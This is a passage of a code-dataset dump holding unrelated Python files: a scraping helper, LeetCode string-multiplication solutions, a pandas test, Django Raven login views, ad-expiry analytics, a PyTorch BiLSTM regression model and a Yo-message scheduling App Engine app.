Popup(root)\n\tpopup.wait_window()\n\troot.mainloop()","sub_path":"menu/popup/headPose.py","file_name":"headPose.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"454935057","text":"from bs4 import BeautifulSoup\nimport requests\n\n\nclass UniqueID:\n def __init__(self, league_id, league_name, team_id, team_name, team_order, week_id, time_id=0):\n self.league_id = league_id\n self.team_id = team_id\n self.week = week_id\n self.time = time_id\n self.team_name = team_name\n self.league_name = league_name\n self.team_order = team_order\n\n def get_id_array(self):\n return [self.league_id, self.league_name, self.team_id, self.team_name, self.team_order, self.week, self.time]\n\n def get_id_string(self):\n return 'ID: ' + 'Week ' + str(self.week) + ' Time ' + str(self.time) + ', ' + str(self.league_id) + \", \" + str(self.team_id)\n\n\ndef get_soup_url(url):\n page = requests.get(url)\n soup = BeautifulSoup(page.content, 'html.parser')\n return soup\n\n\ndef get_soup_file(html_file):\n with open(html_file) as current_html:\n soup = BeautifulSoup(current_html, 'html.parser')\n return soup\n\n\ndef floatify(array):\n for index in range(len(array)):\n try:\n array[index] = float(array[index])\n except Exception as e:\n # print(e)\n pass\n return array\n\n\ndef player_data_float_convert(player_data):\n all_info = []\n for player_info in player_data:\n new_player = []\n for item in range(len(player_info)):\n try:\n new_player.append(float(player_info[item]))\n except Exception as e:\n new_player.append(player_info[item])\n all_info.append(new_player)\n return all_info\n\n\n","sub_path":"archive/Helper.py","file_name":"Helper.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"560600296","text":"# 作弊的写法,不过也能通过,还能击败95%的人!\nclass Solution:\n def multiply(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n return str(int(num1) * int(num2))\n\n\n# 模仿在纸上做乘法的过程写出一个算法\nclass Solution(object):\n def multiply(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n if num1 == \"0\" or num2 == \"0\":\n return \"0\"\n ans = \"0\"\n index = 0\n for i in range(len(num2) - 1, -1, -1):\n # 保存进位\n carry = 0\n # 直接用字符串保存每一位乘出来的数\n ans_part = \"\"\n # num2当前数字保存在x2中\n x2 = ord(num2[i]) - ord(\"0\")\n # 乘上num1的每一位\n for j in range(len(num1) - 1, -1, -1):\n x1 = ord(num1[j]) - ord(\"0\")\n # 相乘的结果加上进位\n mul = x2 * x1 + carry\n ans_part = str(mul % 10) + ans_part\n carry = mul // 10\n if carry > 0:\n ans_part = str(carry) + ans_part\n for k in range(index):\n ans_part += \"0\"\n index += 1\n # 和之前的结果相加\n # 两个str相加并返回str,leetcode-415\n ans = self.addStrings(ans, ans_part)\n return ans\n\n def addStrings(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n if not num1:\n return num2\n if not num2:\n return num1\n res = ''\n # count存储进位\n count = 0\n m, n = len(num1), len(num2)\n # 1.使两个字符串长度匹配\n if m > n:\n num2 = \"0\" * (m - n) + num2\n elif m < n:\n num1 = \"0\" * (n - m) + num1\n i, j = len(num1) - 1, len(num2) - 1\n while i >= 0 and j >= 0:\n # 将str转换为int,不使用int(),使用ASCII码相减,或者使用一个list或dict存储0-9和\"0\"-\"9\"的对应也行\n value = ord(num1[i]) + ord(num2[j]) + count - 2 * ord(\"0\")\n if value >= 10:\n count = 1\n res = str(value % 10) + res\n else:\n count = 0\n res = str(value) + res\n i -= 1\n j -= 1\n # 最后输出结果的时候要判断有没有进位\n return \"1\" + res if count == 1 else res\n\n\nclass Solution:\n def multiply(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n # 需要考虑两个问题\n # 1.字符串和数字的相互转换,不使用str或者int函数\n # 2.数字的相乘可能会溢出(python3中int就是long,不需要考虑,但这题需要考虑)\n if num1 == '0' or num2 == '0':\n return \"0\"\n m, n = len(num1), len(num2)\n # m位数和n位数的乘积是一个min(m,n)到m+n位的数\n pos = [0 for _ in range(m + n)]\n # 两个数都从最后一位开始,逆序相乘\n for i in range(m - 1, -1, -1):\n for j in range(n - 1, -1, -1):\n # 把字符串转换为数字,不使用int,可以使用ord相减,ord是ASCII码,其他语言中\n # 可以直接字符串相减,python中不行\n # 相乘的结果\n mul = (ord(num1[i]) - ord('0')) * (ord(num2[j]) - ord('0'))\n # num1 的第 i 位乘上 num2 的第 j 位,结果会分别对应 pos 的第 i + j 位和第 i + j + 1 位\n p1, p2 = i + j, i + j + 1\n # 当前位��结果等于mul加上之前的进位\n sum_ = mul + pos[p2]\n\n pos[p1] += sum_ // 10\n pos[p2] = sum_ % 10\n result = []\n # result = pos从第一个不为0的值开始往后的所有值\n for p in pos:\n if len(result) != 0 or p != 0:\n result.append(p)\n return ''.join(str(s) for s in result)\n\n\nnum1 = '123'\nnum2 = '456'\nprint(Solution().multiply(num1, num2))\n","sub_path":"multiply_strings_43.py","file_name":"multiply_strings_43.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"511867626","text":"#測試pandas的Series、DataFrame\n\nimport pandas as pd\n\ns = pd.Series([1,343,'ddd'])\ns2 = pd.Series([1,3,33,'string'],index=[3,4,5,8])\ns3 = pd.Series([1,3,5,'string2'],name='s3的名字')\ns4 = s2.append(s3)\nprint (s4)\n#Series就像橫向(行)的dict變成直向版本 ,一維數組,no columns\n#切片賦值可 ##### Series的要素是index、data\n\n#以下為二維數組,dataframe,就是表格,并同時有index、columns\n#list of dict,多個Series可構建為一個dataframe\n##### dataframe的要素是index、columns、data\n\ndata = {'a':[1,2,3,4],'z':[4,5,5,'dd']}#字典已經包含columns、data\n#創建dataframe\ndf0 = pd.DataFrame(data,index=['第一行','第2行','第三hang','44thRow'])\ndf1 = pd.DataFrame({'公司名稱':'codeForShop','dfsdf':'dfa'},index=['第2行'])\ndf =df0.append(df1)\n\n\n\n\nprint (df)\n#用series和dataframe開一個空白行(行!是行)\n","sub_path":"PythonPandas/testPandas.py","file_name":"testPandas.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"152976195","text":"import urllib\n\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.core.urlresolvers import reverse\n\nfrom pyroven.utils import setting, HttpResponseSeeOther\nimport pyroven\n\ndef raven_return(request):\n # Get the token which the Raven server sent us - this should really\n # have a try/except around it to catch KeyError\n token = request.GET['WLS-Response']\n\n # See if this is a valid token\n try:\n user = authenticate(response_str=token, request=request)\n except pyroven.MalformedResponseError:\n return HttpResponseRedirect(\"/\")\n except Exception as e:\n return HttpResponse(e)\n\n if user is None:\n \"Print no user\"\n elif not user.is_active:\n return HttpResponse(\"Your account has been disabled\")\n else:\n login(request, user)\n\n # Redirect somewhere sensible\n next_page = request.GET.get('next', '/')\n if next_page == \"\":\n next_page = \"/\"\n\n extra_url_arg_values = {}\n extra_url_args = set(setting('PYROVEN_PASSTHROUGH_URL_ARGS', []))\n for k in extra_url_args:\n if k in request.GET:\n extra_url_arg_values[k] = request.GET.get(k)\n\n url_extra = ''\n if len(extra_url_args) > 0:\n url_extra = \"?%s\" % \"&\".join([\"%s=%s\" % (k, v) for (k, v) in extra_url_arg_values.items()])\n\n return HttpResponseRedirect(next_page + url_extra)\n\ndef raven_login(request):\n # Get the Raven object and return a redirect to the Raven server\n login_url = setting('PYROVEN_LOGIN_URL')\n if login_url is None:\n raise Exception(\"pyroven error: You must define PYROVEN_LOGIN_URL in your project settings file.\")\n\n extra_url_arg_values = {}\n extra_url_args = set(setting('PYROVEN_PASSTHROUGH_URL_ARGS', []))\n extra_url_args.add('next')\n for k in extra_url_args:\n if k in request.GET:\n extra_url_arg_values[k] = request.GET.get(k)\n\n url_extra = ''\n if len(extra_url_args) > 0:\n url_extra = \"?%s\" % \"&\".join([\"%s=%s\" % (k, v) for (k, v) in extra_url_arg_values.items()])\n\n relative_return_url = \"%s%s\" % (reverse('raven_return'), url_extra)\n\n encoded_return_url = urllib.quote(request.build_absolute_uri(relative_return_url))\n return HttpResponseSeeOther(\"%s?ver=%d&url=%s\" % (login_url, 2,\n encoded_return_url)\n )\n\ndef raven_logout(request):\n logout(request)\n","sub_path":"pyroven/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"247140653","text":"from datetime import date\r\nfrom .models import Ads,View\r\n# Checks the ads expiry date and deletes it if it has expired\r\ndef landlord(request,ads):\r\n\t# Checks todays date\r\n\ttoday = date.today()\r\n\t\r\n\t# Loops over the queryset\r\n\tfor ad in ads:\r\n\t\t\r\n\t\t# Calculate the days btw\r\n\t\ttime_notice = today - ad.date_adder\r\n\t\t\r\n\t\tprint(ad.date_adder,ad,time_notice)\r\n\t\t# If the days btw is greater than the allocated time\r\n\t\tif time_notice.days >= int(ad.time_wait):\r\n\t\t\t\r\n\t\t\t# Stop the ad\r\n\t\t\tad.expired = 'True'\r\n\r\n\t\t\t# Save to the database\r\n\t\t\tad.save()\r\n\r\n# For the user ad owner\r\ndef admin_landlord(request,ad):\r\n\t# Checks todays date\r\n\ttoday = date.today()\r\n\t\r\n\t# Calculate the days btw\r\n\ttime_notice = today - ad.date_adder\r\n\r\n\t# Day remaining\r\n\tdays = int(ad.time_wait) - time_notice.days\r\n\t\r\n\t# If the days btw is greater than the allocated time\r\n\tif time_notice.days >= int(ad.time_wait):\r\n\t\t\r\n\t\t# Stop the ad\r\n\t\tad.expired = 'True'\r\n\r\n\t\t# Save to the database\r\n\t\tad.save()\r\n\r\n\treturn days\r\n\r\n# Calculates the number of users that saw it\r\ndef seen_by(request,ads):\r\n\t# Lops over the ads\r\n\tfor ad in ads:\r\n\t\t# Gets the one that is currently being seen\r\n\t\tadsee = Ads.objects.get(id=ad.id)\r\n\t\t# Increments the ads views\r\n\t\tad.views = ad.views + 1\r\n\t\t# Creates a view object for date analytics\r\n\t\tad_me = View.objects.create(ads=adsee,views_cal='v')\r\n\t\t# Saves the view object being created \r\n\t\tad_me.save()\r\n\t\t# Saves th\r\n\t\tad.save()","sub_path":"adengine/analytics.py","file_name":"analytics.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"233088325","text":"\r\nimport pickle\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom sklearn.model_selection import train_test_split\r\nfrom torch import nn\r\nfrom torch.autograd import Variable\r\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\r\nfrom torch.utils.data import Dataset\r\nif torch.cuda.is_available():\r\n device = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc.\r\nelse:\r\n device = torch.device(\"cpu\")\r\n\r\n# device = torch.device(\"cpu\")\r\ndef lossFunction(all_outputs, labels_all):\r\n error = nn.MSELoss(size_average=None, reduce=None, reduction='mean') # mean\r\n\r\n outputs = torch.flatten(all_outputs[0]) # label\r\n outputs_l = torch.flatten(all_outputs[1]) # label\r\n outputs_d = torch.flatten(all_outputs[2]) # label\r\n outputs_c = torch.flatten(all_outputs[3]) # label\r\n\r\n labels = torch.flatten(labels_all[:, -1])\r\n # Calculate softmax and ross entropy loss\r\n # loss = error(outputs, labels)\r\n loss_out = error(outputs, labels) # labels in ns\r\n loss_l = error(outputs_l, labels_all[:, 0].view(labels_all.size()[0]))\r\n loss_d = error(outputs_d, labels_all[:, 1].view(labels_all.size()[0]))\r\n loss_c = error(outputs_c, labels_all[:, 2].view(labels_all.size()[0]))\r\n\r\n # Calculating auto gradients\r\n loss_seq = []\r\n loss_seq.append(loss_l)\r\n loss_seq.append(loss_d)\r\n loss_seq.append(loss_c)\r\n # loss_seq.append((loss_l + loss_d + loss_c)/3)\r\n loss_seq.append(loss_out)\r\n return loss_seq\r\n\r\nclass NumbersDataset(Dataset):\r\n def __init__(self, x, lens, y):\r\n self.x = x\r\n self.lens = lens\r\n self.y = y\r\n\r\n def __len__(self):\r\n return len(self.y)\r\n\r\n def __getitem__(self, idx):\r\n return self.x[idx], self.lens[idx], self.y[idx]\r\n\r\nclass MLP(torch.nn.Module):\r\n def __init__(self, input_dim, hidden_dim, output_dim):\r\n super(MLP, self).__init__()\r\n self.input_dim = input_dim\r\n self.hidden_dim = hidden_dim\r\n self.fc1 = torch.nn.Linear(self.input_dim, self.hidden_dim)\r\n self.fc2 = torch.nn.Linear(self.hidden_dim, self.hidden_dim)\r\n self.fc3 = torch.nn.Linear(self.hidden_dim, output_dim)\r\n\r\n def forward(self, x):\r\n # print(x.size())\r\n hidden = torch.tanh(self.fc1(x))\r\n # hidden = F.relu(self.fc1(x))\r\n output = self.fc3(hidden) # output layer\r\n #----another design-----------\r\n # hidden_1 = self.fc1(x))\r\n # print(hidden_1.size())\r\n # hidden_2 = F.relu(self.fc2(hidden_1))\r\n # hidden_2 = F.tanh(self.fc2(hidden_1))\r\n # print(hidden_2.size())\r\n # out = F.dropout(hidden_2, training=self.training)\r\n # output = self.fc3(out) # output layer\r\n # print(output.size())\r\n\r\n return output\r\n\r\nclass RNNModel(nn.Module):\r\n def __init__(self, input_dim, hidden_dim, layer_dim, output_dim):\r\n super(RNNModel, self).__init__()\r\n # Number of hidden dimensions\r\n self.hidden_dim = hidden_dim\r\n\r\n # Number of hidden layers\r\n self.layer_dim = layer_dim\r\n\r\n # RNN\r\n # self.rnn = nn.LSTM(input_dim, hidden_dim, layer_dim, batch_first=True)\r\n self.rnn = nn.LSTM(input_dim, hidden_dim, layer_dim, batch_first=True, bidirectional=True)\r\n # tensor containing the output features (h_t) from the last layer of the LSTM\r\n\r\n # Readout layer\r\n # self.fc = nn.Linear(hidden_dim, hidden_dim) # layer conversion\r\n self.fc = nn.Linear(hidden_dim * 4, hidden_dim) # 2 for bidirection\r\n self.fc1 = nn.Linear(hidden_dim * 3, hidden_dim) # 3 for concatenating 3 bilstm\r\n self.fc2 = nn.Linear(hidden_dim, output_dim) # layer conversion\r\n\r\n def forward(self, x_l, x_d, x_c):\r\n # Set initial states\r\n h0_l = torch.zeros(self.layer_dim * 2, x_l.size(0), self.hidden_dim).to(device) # 2 for bidirection\r\n c0_l = torch.zeros(self.layer_dim * 2, x_l.size(0), self.hidden_dim).to(device)\r\n # print(h0_l.size()) #[layer*2, hidden_dimension, batch_size]\r\n h0_d = torch.zeros(self.layer_dim * 2, x_d.size(0), self.hidden_dim).to(device) # 2 for bidirection\r\n c0_d = torch.zeros(self.layer_dim * 2, x_d.size(0), self.hidden_dim).to(device)\r\n\r\n h0_c = torch.zeros(self.layer_dim * 2, x_c.size(0), self.hidden_dim).to(device) # 2 for bidirection\r\n c0_c = torch.zeros(self.layer_dim * 2, x_c.size(0), self.hidden_dim).to(device)\r\n\r\n # Forward propagate LSTM\r\n out_l_a, _l = self.rnn(x_l, (h0_l, c0_l)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n # print(out_l.size()) #[batch, 5, hidden*2] # 5 is the maximum pair of l_type in one path\r\n out_d_a, _d = self.rnn(x_d, (h0_d, c0_d)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n # out_d_init, _d_init = self.rnn(x_d[:, 0:1, :], (h0_d, c0_d)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n # print(out_d_init.size()) #[batch, 1, hidden*2]\r\n # out_d_mid, _d_mid = self.rnn(x_d[:, 1:-1, :], (h0_d, c0_d)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n # print(out_d_mid.size()) #[batch, 26, hidden*2]\r\n # out_d_last, _d_last = self.rnn(x_d[:, -1:x_d.size(1), :], (h0_d, c0_d)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n # print(out_d_a[:, 0, :].size()) #[batch, 1, hidden*2]\r\n # print(out_d_a[:, -1, :].size()) # [batch, 1, hidden*2]\r\n\r\n # out_d = torch.cat((torch.cat((out_d_init, out_d_mid), dim=1), out_d_last), dim=1)\r\n # print(out_d.size()) #[batch, 28, hidden*2] # 28 is the maximum pair of d_type in one path\r\n\r\n out_c_a, _c = self.rnn(x_c, (h0_c, c0_c)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n # print(out_c.size()) #[batch, 5, hidden*2] # 5 is the maximum pair of c_type in one path\r\n\r\n # # Decode the hidden state of the last time step of forward path\r\n # out_l_f = self.fc(out_l[:, -1, :])\r\n # out_d_f = self.fc(out_d[:, -1, :])\r\n # out_c_f = self.fc(out_c[:, -1, :])\r\n # # Decode the hidden state of the last time step of reverse path\r\n # out_l_r = self.fc(out_l[:, 0, :])\r\n # out_d_r = self.fc(out_d[:, 0, :])\r\n # out_c_r = self.fc(out_c[:, 0, :])\r\n\r\n # merging two cell final stages of forward and reverse path\r\n out_d = F.relu(self.fc(torch.cat((out_d_a[:, -1, :], out_d_a[:, 0, :]), dim=1)))\r\n out_l = F.relu(self.fc(torch.cat((out_l_a[:, -1, :], out_l_a[:, 0, :]), dim=1)))\r\n out_c = F.relu(self.fc(torch.cat((out_c_a[:, -1, :], out_c_a[:, 0, :]), dim=1)))\r\n\r\n # merging all cell final stages\r\n # out_d = F.relu(nn.Linear(torch.flatten(out_d_a, start_dim=1).size()[1], self.hidden_dim)(torch.flatten(out_d_a, start_dim=1)))\r\n # out_l = F.relu(nn.Linear(torch.flatten(out_l_a, start_dim=1).size()[1], self.hidden_dim)(torch.flatten(out_l_a, start_dim=1)))\r\n # out_c = F.relu(nn.Linear(torch.flatten(out_c_a, start_dim=1).size()[1], self.hidden_dim)(torch.flatten(out_c_a, start_dim=1)))\r\n\r\n\r\n out_ld = torch.cat((out_l, out_d), dim=1)\r\n out_ldc = torch.cat((out_ld, out_c), dim=1)\r\n # print(out_ldc.size()) #[batch, hidden*3]\r\n\r\n out = F.relu(self.fc1(out_ldc)) # activation layer\r\n # print(out.size()) #[batch, hidden]\r\n out = F.dropout(out, training=self.training)\r\n out = self.fc2(out) # output layer\r\n # print(out.size()) #[hidden, 1]\r\n\r\n return out\r\n\r\nclass BiLSTM_MLP(nn.Module):\r\n def __init__(self, input_dim, hidden_dim, layer_dim, output_dim, dropout=0.1):\r\n '''Everything which contains weights which you want to be trained during the training process should be defined in your __init__ method.\r\n You don't need do define activation functions like softmax, ReLU or sigmoid in your __init__, you can just call them in forward.'''\r\n super(BiLSTM_MLP, self).__init__()\r\n # Number of hidden dimensions\r\n self.hidden_dim = hidden_dim\r\n\r\n # Number of hidden layers\r\n self.layer_dim = layer_dim\r\n\r\n self.dropout = dropout\r\n\r\n # RNN\r\n # self.rnn = nn.LSTM(input_dim, hidden_dim, layer_dim, batch_first=True)\r\n self.rnn = nn.LSTM(input_dim, hidden_dim, layer_dim, batch_first=True, bidirectional=True)\r\n # tensor containing the output features (h_t) from the last layer of the LSTM\r\n\r\n # Readout layer\r\n # self.fc = nn.Linear(hidden_dim, hidden_dim) # layer conversion\r\n self.fc = nn.Linear(hidden_dim * 4, hidden_dim) # 2 for bidirection\r\n # self.fc1 = nn.Linear((hidden_dim * 3), (hidden_dim * 2)) # 3 for concatenating 3 bilstm\r\n # self.fc1 = nn.Linear((hidden_dim * 3), (hidden_dim * 2))\r\n # self.fc1 = nn.Linear((hidden_dim * 3), hidden_dim * 2) # 3 for concatenating 3 bilstm\r\n self.fc1 = nn.Linear((hidden_dim * 3)+1, hidden_dim * 2) # 3 for concatenating 3 bilstm + voltage\r\n # self.fc1 = nn.Linear((hidden_dim * 3) + 3, hidden_dim*2) # 3 for concatenating 3 bilstm + 3 sublabels\r\n # self.fc1 = nn.Linear((hidden_dim * 3) + 4, hidden_dim) # 3 for concatenating 3 bilstm + 3 sublabels + setup\r\n self.fc2 = nn.Linear(hidden_dim*2, output_dim) # layer conversion\r\n # self.fc3 = nn.Linear(hidden_dim, output_dim) # layer conversion\r\n self.fc3 = nn.Linear(hidden_dim + 1, output_dim) # layer conversion\r\n\r\n # ----\r\n self.fc_l = nn.Linear(hidden_dim * 4*2, hidden_dim) # 2 for bidirection\r\n self.fc_d = nn.Linear(hidden_dim * 28*2, hidden_dim) # 2 for bidirection\r\n self.fc_c = nn.Linear(hidden_dim * 4*2, hidden_dim) # 2 for bidirection\r\n\r\n\r\n\r\n def forward(self, x_l, x_d, x_c, x_vs):\r\n\r\n # Set initial states\r\n h0_l = torch.zeros(self.layer_dim * 2, x_l.size(0), self.hidden_dim).to(device) # 2 for bidirection\r\n c0_l = torch.zeros(self.layer_dim * 2, x_l.size(0), self.hidden_dim).to(device)\r\n # print(h0_l.size()) #[layer*2, hidden_dimension, batch_size]\r\n h0_d = torch.zeros(self.layer_dim * 2, x_d.size(0), self.hidden_dim).to(device) # 2 for bidirection\r\n c0_d = torch.zeros(self.layer_dim * 2, x_d.size(0), self.hidden_dim).to(device)\r\n\r\n h0_c = torch.zeros(self.layer_dim * 2, x_c.size(0), self.hidden_dim).to(device) # 2 for bidirection\r\n c0_c = torch.zeros(self.layer_dim * 2, x_c.size(0), self.hidden_dim).to(device)\r\n\r\n # Forward propagate LSTM\r\n out_l_a, _l = self.rnn(x_l, (h0_l, c0_l)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n out_d_a, _d = self.rnn(x_d, (h0_d, c0_d)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n out_c_a, _c = self.rnn(x_c, (h0_c, c0_c)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n\r\n # merging two cell final stages of forward and reverse path\r\n # Activation layer 1\r\n #-----------selu-------------\r\n out_l = F.selu(self.fc(torch.cat((out_l_a[:, -1, :], out_l_a[:, 0, :]), dim=1)))\r\n out_d = F.selu(self.fc(torch.cat((out_d_a[:, -1, :], out_d_a[:, 0, :]), dim=1)))\r\n out_c = F.selu(self.fc(torch.cat((out_c_a[:, -1, :], out_c_a[:, 0, :]), dim=1)))\r\n\r\n #----Selu/Taking all o/p of bilstm-----\r\n # print(out_l_a.reshape(out_l_a.shape[0],( out_l_a.shape[1]*out_l_a.shape[2])).shape)\r\n # print(out_l_a.shape)\r\n # out_l = F.selu(self.fc_l(out_l_a.reshape(out_l_a.shape[0],( out_l_a.shape[1]*out_l_a.shape[2]))))\r\n # out_d = F.selu(self.fc_l(out_l_a.reshape(out_d_a.shape[0],( out_l_a.shape[1]*out_d_a.shape[2]))))\r\n # out_c = F.selu(self.fc_l(out_l_a.reshape(out_c_a.shape[0],( out_l_a.shape[1]*out_c_a.shape[2]))))\r\n #-----------relu-------------\r\n # out_l = F.relu(self.fc(torch.cat((out_l_a[:, -1, :], out_l_a[:, 0, :]), dim=1)))\r\n # out_d = F.relu(self.fc(torch.cat((out_d_a[:, -1, :], out_d_a[:, 0, :]), dim=1)))\r\n # out_c = F.relu(self.fc(torch.cat((out_c_a[:, -1, :], out_c_a[:, 0, :]), dim=1)))\r\n #--------------rrelu------------\r\n # out_l = F.rrelu(self.fc(torch.cat((out_l_a[:, -1, :], out_l_a[:, 0, :]), dim=1)))\r\n # out_d = F.rrelu(self.fc(torch.cat((out_d_a[:, -1, :], out_d_a[:, 0, :]), dim=1)))\r\n # out_c = F.rrelu(self.fc(torch.cat((out_c_a[:, -1, :], out_c_a[:, 0, :]), dim=1)))\r\n #--------------tanhshrink--------\r\n # out_l = F.tanhshrink(self.fc(torch.cat((out_l_a[:, -1, :], out_l_a[:, 0, :]), dim=1)))\r\n # out_d = F.tanhshrink(self.fc(torch.cat((out_d_a[:, -1, :], out_d_a[:, 0, :]), dim=1)))\r\n # out_c = F.tanhshrink(self.fc(torch.cat((out_c_a[:, -1, :], out_c_a[:, 0, :]), dim=1)))\r\n #--------------tanh--------------\r\n # out_l = F.tanh(self.fc(torch.cat((out_l_a[:, -1, :], out_l_a[:, 0, :]), dim=1)))\r\n # out_d = F.tanh(self.fc(torch.cat((out_d_a[:, -1, :], out_d_a[:, 0, :]), dim=1)))\r\n # out_c = F.tanh(self.fc(torch.cat((out_c_a[:, -1, :], out_c_a[:, 0, :]), dim=1)))\r\n #--------------softmax------------\r\n # out_l = nn.Softmax(dim=1)(self.fc(torch.cat((out_l_a[:, -1, :], out_l_a[:, 0, :]), dim=1)))\r\n # out_d = nn.Softmax(dim=1)(self.fc(torch.cat((out_d_a[:, -1, :], out_d_a[:, 0, :]), dim=1)))\r\n # out_c = nn.Softmax(dim=1)(self.fc(torch.cat((out_c_a[:, -1, :], out_c_a[:, 0, :]), dim=1)))\r\n\r\n # sub_label_prediction:\r\n # sub_l = self.fc3(out_l)\r\n # sub_d = self.fc3(out_d)\r\n # sub_c = self.fc3(out_c)\r\n sub_l = self.fc3(torch.cat((out_l, x_vs[:, 0].view(x_vs.size()[0], 1)), dim=1)) # voltage\r\n sub_d = self.fc3(torch.cat((out_d, x_vs[:, 0].view(x_vs.size()[0], 1)), dim=1)) # voltage\r\n sub_c = self.fc3(torch.cat((out_c, x_vs[:, 0].view(x_vs.size()[0], 1)), dim=1)) # voltage\r\n # sub_l = F.selu(self.fc3(F.dropout(out_l, p=self.dropout, training=self.training)))\r\n # sub_d = F.selu(self.fc3(F.dropout(out_d, p=self.dropout, training=self.training)))\r\n # sub_c = F.selu(self.fc3(F.dropout(out_c, p=self.dropout, training=self.training)))\r\n\r\n # sub_l = F.tanh(self.fc3(out_l))\r\n # sub_d = F.tanh(self.fc3(out_d))\r\n # sub_c = F.tanh(self.fc3(out_c))\r\n\r\n\r\n\r\n # concatenating without sublabels\r\n out_ld = torch.cat((out_l, out_d), dim=1)\r\n # out_ld_set = torch.cat((out_ld, x_sub[:, 3].view(x_sub.size()[0], 1)), dim=1)\r\n # out_ldc = torch.cat((out_ld_set, out_c), dim=1)\r\n out_ldc = torch.cat((out_ld, out_c), dim=1)\r\n out_ldcvs = torch.cat((out_ldc, x_vs[:,0].view(x_vs.size()[0],1)), dim=1) # voltage\r\n\r\n\r\n # # concatenating with sublabels\r\n # out_ls = torch.cat((out_l, x_sub[:, 0].view(x_sub.size()[0], 1)), dim=1) #l\r\n # out_lsd = torch.cat((out_ls, out_d), dim=1)\r\n # out_lsds = torch.cat((out_lsd, x_sub[:, 1].view(x_sub.size()[0], 1)), dim=1) #d\r\n # # out_lsd_set = torch.cat((out_lsd, x_sub[:, 3].view(x_sub.size()[0], 1)), dim=1) # setup time\r\n # # out_lsds = torch.cat((out_lsd_set, x_sub[:, 1].view(x_sub.size()[0], 1)), dim=1)\r\n # out_lsdsc = torch.cat((out_lsds, out_c), dim=1)\r\n # out_lsdscs = torch.cat((out_lsdsc, x_sub[:, 2].view(x_sub.size()[0], 1)), dim=1) #c\r\n\r\n # Activation layer 2\r\n # out = F.selu(self.fc1(out_ldc)) # activation layer\r\n # out = F.tanh(self.fc1(out_ldc)) # activation layer\r\n out = F.selu(self.fc1(out_ldcvs)) # activation layer\r\n # out = F.tanh(self.fc1(out_ldc)) # activation layer, tanhshrink better\r\n # out = F.selu(self.fc1(out_lsdscs)) # activation layer\r\n # out = F.tanh(self.fc1(out_lsdscs)) # activation layer\r\n # print(out.size()) #[batch, hidden]\r\n # out = F.dropout(out, training=self.training)\r\n out = F.dropout(out, p=self.dropout, training=self.training)\r\n out = self.fc2(out) # output layer\r\n # print(out.size()) #[hidden, 1]\r\n\r\n\r\n del h0_l, c0_l, h0_d, c0_d, h0_c, c0_c, out_l_a, out_d_a, out_c_a, out_l, out_d, out_c, out_ld, out_ldc, out_ldcvs\r\n torch.cuda.empty_cache()\r\n # return out\r\n return out, sub_l, sub_d, sub_c","sub_path":"main/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":16300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"108799906","text":"import webapp2, urllib, jinja2, os\nfrom google.appengine.api import taskqueue\nfrom google.appengine.api import urlfetch\n\nfrom apikeys import * # contains api key for YOAFTER15MIN,YOAFTER30MIN,YOAFTERANHOUR \n\nSINGLE_YO_API = \"http://api.justyo.co/yo/\"\n\njinja_environment = jinja2.Environment(autoescape=True,\n loader=jinja2.FileSystemLoader(os.path.join(os.path.dirname(__file__), 'templates')))\n\nclass BaseScheduleHandler(webapp2.RequestHandler):\n \n def __init__(self, request=None, response=None, apitoken=None, delay=None):\n self.initialize(request, response)\n self.apitoken = apitoken\n self.delay = delay\n \n def get(self):\n username = self.request.get(\"username\")\n if username:\n taskqueue.add(url=\"/yo\", params={\"username\":username.upper(), \"api_token\":self.apitoken}, method=\"POST\", countdown=self.delay)\n\n \nclass FifteenMinuteHandler(BaseScheduleHandler):\n def __init__(self, request=None, response=None):\n BaseScheduleHandler.__init__(self, request, response, YOAFTER15MIN, 15 * 60)\n \nclass ThirtyMinuteHandler(BaseScheduleHandler):\n def __init__(self, request=None, response=None):\n BaseScheduleHandler.__init__(self, request, response, YOAFTER30MIN, 30 * 60)\n\nclass OneHourHandler(BaseScheduleHandler):\n def __init__(self, request=None, response=None):\n BaseScheduleHandler.__init__(self, request, response, YOAFTERANHOUR, 60 * 60)\n \nclass YoHandler(webapp2.RequestHandler):\n \n def post(self):\n params = {field:self.request.get(field) for field in self.request.arguments()}\n if \"username\" in params and \"api_token\" in params:\n form_data = urllib.urlencode(params)\n urlfetch.fetch(url=SINGLE_YO_API,\n payload=form_data,\n method=urlfetch.POST,\n headers={'Content-Type': 'application/x-www-form-urlencoded'})\n\nclass HomePageHandler(webapp2.RequestHandler):\n \n def get(self):\n template = 